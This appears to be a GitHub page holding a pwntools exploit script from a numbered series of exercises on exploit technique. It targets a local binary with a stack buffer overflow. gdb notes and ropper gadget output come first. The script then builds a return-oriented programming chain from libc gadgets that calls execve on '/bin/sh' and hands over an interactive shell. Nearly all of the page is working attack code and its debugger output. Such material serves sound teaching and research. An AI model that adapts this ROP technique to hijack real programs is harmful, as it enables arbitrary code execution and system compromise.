-
Notifications
You must be signed in to change notification settings - Fork 93
/
07-execve-rop.py
executable file
·80 lines (66 loc) · 2.09 KB
/
07-execve-rop.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
"""
(gdb) b *(&vulnerable)
Breakpoint 1 at 0x80484b6: file src/07-execve-rop.c, line 5.
(gdb) c
Continuing.
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...
Reading /lib/i386-linux-gnu/libc-2.27.so from remote target...
Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target...
Breakpoint 1, vulnerable () at src/07-execve-rop.c:5
5 int vulnerable() {
(gdb) i r $esp
esp 0xffffcf8c 0xffffcf8c
(gdb) p &buffer[0]
$1 = 0xffffcf00 ""
(gdb) info proc mappings
process 15016
Mapped address spaces:
Start Addr End Addr Size Offset objfile
...
0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so
0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so
...
"""
"""
$ ropper --nocolor --file /lib/i386-linux-gnu/libc-2.27.so
0x00002d37: int 0x80;
0x00024b5e: pop eax; ret;
0x00018be5: pop ebx; ret;
0x001926d5: pop ecx; ret;
0x00001aae: pop edx; ret;
"""
import struct
import sys
from pwn import *
context(arch='x86', os='linux', endian='little', word_size=32)
binary_path = './bin/x86/07-execve-rop'
libc_path = '/lib/i386-linux-gnu/libc-2.27.so'
vulnerable_ret_addr = 0xffffcf8c
buffer_addr = 0xffffcf00
libc_addr = 0xf7dd1000
int_0x80_addr = libc_addr + 0x00002d37
pop_eax_ret_addr = libc_addr + 0x00024b5e
pop_ebx_ret_addr = libc_addr + 0x00018be5
pop_ecx_ret_addr = libc_addr + 0x001926d5
pop_edx_ret_addr = libc_addr + 0x00001aae
libc = ELF(libc_path)
bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next()
p = process(binary_path)
#p = gdb.debug([binary_path])
payload = ''
payload += 'a' * (vulnerable_ret_addr - buffer_addr)
payload += p32(pop_eax_ret_addr)
payload += p32(0xb) # execve syscall
payload += p32(pop_ebx_ret_addr)
payload += p32(bin_sh_addr)
payload += p32(pop_ecx_ret_addr)
payload += p32(0) # argv
payload += p32(pop_edx_ret_addr)
payload += p32(0) # envp
payload += p32(int_0x80_addr)
p.readuntil('> ')
p.write(payload)
p.interactive()